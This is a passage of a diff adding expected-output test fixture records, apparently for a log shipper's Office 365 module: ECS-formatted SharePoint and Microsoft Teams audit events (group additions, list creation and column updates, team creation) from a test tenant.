+ "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 8147, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "f84f38b0-1963-4a1d-454e-08d8c9b586e9", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "users Owners", + "o365.audit.TargetUserOrGroupType": "SecurityGroup", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:55.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "e85ec350-af23-47a7-5b33-08d8c9b586be", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 8940, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:55", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "e85ec350-af23-47a7-5b33-08d8c9b586be", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "SHAREPOINT\\system", + "o365.audit.TargetUserOrGroupType": "Member", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:08:14.000Z", + "client.address": "52.114.88.180", + "client.ip": "52.114.88.180", + "event.action": "ListUpdated", + "event.category": "web", + "event.code": "SharePointListOperation", + "event.dataset": "o365.audit", + "event.id": "32474de1-fca7-4d81-4f97-08d8c9b591a4", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 9732, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", + "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", + "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.CorrelationId": "fc39a89f-4077-2000-7abb-cbd546e4157d", + "o365.audit.CreationTime": "2021-02-05T09:08:14", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "32474de1-fca7-4d81-4f97-08d8c9b591a4", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 0, + "o365.audit.ItemType": "List", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.Operation": "ListUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 36, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "SkypeSpaces/1.0a$*+", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "i:0h.f|membership|1003200112eb07e6@live.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "52.114.88.180", + "related.user": "root", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "52.114.88.180", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "SkypeSpaces/1.0a$*+" + }, + { + "@timestamp": "2021-02-05T09:08:14.000Z", + "client.address": "52.114.88.180", + "client.ip": "52.114.88.180", + "event.action": "ListCreated", + "event.category": "web", + "event.code": "SharePointListOperation", + "event.dataset": "o365.audit", + "event.id": "20b7fc96-6e31-437a-50fa-08d8c9b59185", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 10806, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", + "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", + "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.CorrelationId": "fc39a89f-4077-2000-7abb-cbd546e4157d", + "o365.audit.CreationTime": "2021-02-05T09:08:14", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "20b7fc96-6e31-437a-50fa-08d8c9b59185", + "o365.audit.ItemType": "List", + "o365.audit.ListBaseTemplateType": "DocumentLibrary", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96CDFC22-2B86-49EA-B4E9-F11888B1665D", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/SiteAssets", + "o365.audit.Operation": "ListCreated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 36, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.UserAgent": "SkypeSpaces/1.0a$*+", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "i:0h.f|membership|1003200112eb07e6@live.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "52.114.88.180", + "related.user": "root", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "52.114.88.180", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "SkypeSpaces/1.0a$*+" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "3813eef0-90e1-4758-54d8-08d8c9b5938e", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 11743, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "3813eef0-90e1-4758-54d8-08d8c9b5938e", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/96cdfc22-2b86-49ea-b4e9-f11888b1665d/03e45e84-1992-4d42-9116-26f756012634", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 12834, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "597a6c1b-fa1f-46aa-f2ce-08d8c9b5938b", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/96cdfc22-2b86-49ea-b4e9-f11888b1665d/0c5e0085-eb30-494b-9cdd-ece1d3c649a2", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "f4579e76-fb4b-4434-904e-08d8c9b59389", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 13925, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "f4579e76-fb4b-4434-904e-08d8c9b59389", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/96cdfc22-2b86-49ea-b4e9-f11888b1665d/39360f11-34cf-4356-9945-25c44e68dade", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "b401dd51-f4a2-477f-cc42-08d8c9b59384", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 15016, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "b401dd51-f4a2-477f-cc42-08d8c9b59384", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListTitle": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/66afcf95-7cd2-4b68-a3e8-3383d908b8f2/03e45e84-1992-4d42-9116-26f756012634", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "073f437c-2e04-441a-05ad-08d8c9b59380", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 16107, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "073f437c-2e04-441a-05ad-08d8c9b59380", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListTitle": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/66afcf95-7cd2-4b68-a3e8-3383d908b8f2/0c5e0085-eb30-494b-9cdd-ece1d3c649a2", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:17.000Z", + "client.address": "51.141.50.227", + "client.ip": "51.141.50.227", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "8f586afb-1438-475e-a4d5-08d8c9b5937d", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 17198, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "OneNote", + "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de", + "o365.audit.ClientIP": "51.141.50.227", + "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0", + "o365.audit.CreationTime": "2021-02-05T09:08:17", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "8f586afb-1438-475e-a4d5-08d8c9b5937d", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListTitle": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/66afcf95-7cd2-4b68-a3e8-3383d908b8f2/39360f11-34cf-4356-9945-25c44e68dade", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "onenoteapi", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "51.141.50.227", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "Cardiff", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.4975, + "source.geo.location.lon": -3.2004, + "source.geo.region_iso_code": "GB-CRF", + "source.geo.region_name": "Cardiff", + "source.ip": "51.141.50.227", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "onenoteapi" + }, + { + "@timestamp": "2021-02-05T09:08:00.000Z", + "event.action": "added-group-account-to", + "event.category": "iam", + "event.code": "MicrosoftTeams", + "event.dataset": "o365.audit", + "event.id": "9b9e973b-64c3-4607-bc79-bf743c985051", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "MicrosoftTeams", + "event.type": [ + "group", + "creation" + ], + "fileset.name": "audit", + "group.name": "users", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 18289, + "o365.audit.CreationTime": "2021-02-05T09:08:00", + "o365.audit.Id": "9b9e973b-64c3-4607-bc79-bf743c985051", + "o365.audit.Operation": "TeamCreated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 25, + "o365.audit.TeamGuid": "19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2", + "o365.audit.TeamName": "users", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 2, + "o365.audit.Version": 1, + "o365.audit.Workload": "MicrosoftTeams", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "root", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + 